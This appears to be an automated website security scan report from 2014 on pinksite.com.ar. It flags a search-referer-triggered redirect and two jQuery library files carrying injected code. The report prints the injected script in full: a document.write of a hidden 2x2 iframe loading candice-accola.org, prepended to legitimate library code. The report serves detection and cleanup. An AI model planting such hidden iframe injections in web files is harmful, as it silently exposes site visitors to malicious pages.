Malicious/Suspicious Redirects
URL: http://pinksite.com.ar/ (imitation of visitor from search engine)
Status: malicious

Request:
GET / HTTP/1.1
Host: pinksite.com.ar
Referer: http://www.google.com/search?q=redirect+check1

Server response:
HTTP/1.1 302 Found
Connection: close
Date: Sat, 20 Sep 2014 03:34:06 GMT
Via: 1.1 varnish
Accept-Ranges: bytes
Age: 0
Location: http://candice-accola.org/mocf.html?h=620063
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 228
Content-Length: 228
Content-Type: text/html; charset=iso-8859-1
Set-Cookie2: WS_Tracker=fe60546b.50376e3d51055; path=/
X-Cache: MISS
X-Varnish: 2557646088

Scanned pages/files
Request | Server response | Status |
http://pinksite.com.ar/ | 200 OK Content-Length: 12436 Content-Type: text/html | clean |
http://pinksite.com.ar/js/lib/jquery-1.4.2.min.js | 200 OK Content-Length: 72335 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=620063></iframe>');
(function(A,w){function ma(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(ma,1);return}c.ready()}}function Qa(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):c.globalEval(b.text||b.textContent||b.innerHTML||"");b.parentNode&&b.parentNode.removeChild(b)}function X(a,b, e&&e.document?e.document.compatMode==="CSS1Compat"&&e.document.documentElement["client"+b]||e.document.body["client"+b]:e.nodeType===9?Math.max(e.documentElement["client"+b],e.body["scroll"+b],e.documentElement["scroll"+b],e.body["offset"+b],e.documentElement["offset"+b]):f===w?c.css(e,d):this.css(d,typeof f==="string"?f:f+"px")}});A.jQuery=A.$=c})(window);
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://candice-accola.org/mocf.html?j=620063
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=620063>
http://pinksite.com.ar/js/lib/jquery.jcarousel.min.js | 200 OK Content-Length: 15811 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=620063></iframe>');
(function(g){var q={vertical:!1,rtl:!1,start:1,offset:1,size:null,scroll:3,visible:null,animation:"normal",easing:"swing",auto:0,wrap:null,initCallback:null,setupCallback:null,reloadCallback:null,itemLoadCallback:null,itemFirstInCallback:null,itemFirstOutCallback:null,itemLastInCallback:null,itemLastOutCallback:null,
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://candice-accola.org/mocf.html?j=620063
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=620063>
http://pinksite.com.ar/<?= $link ?> | 404 Not Found Content-Length: 202 Content-Type: text/html | clean |
http://pinksite.com.ar/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pinksite.com.ar
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://pinksite.com.ar/
Result: pinksite.com.ar is not infected or malware details are not published yet.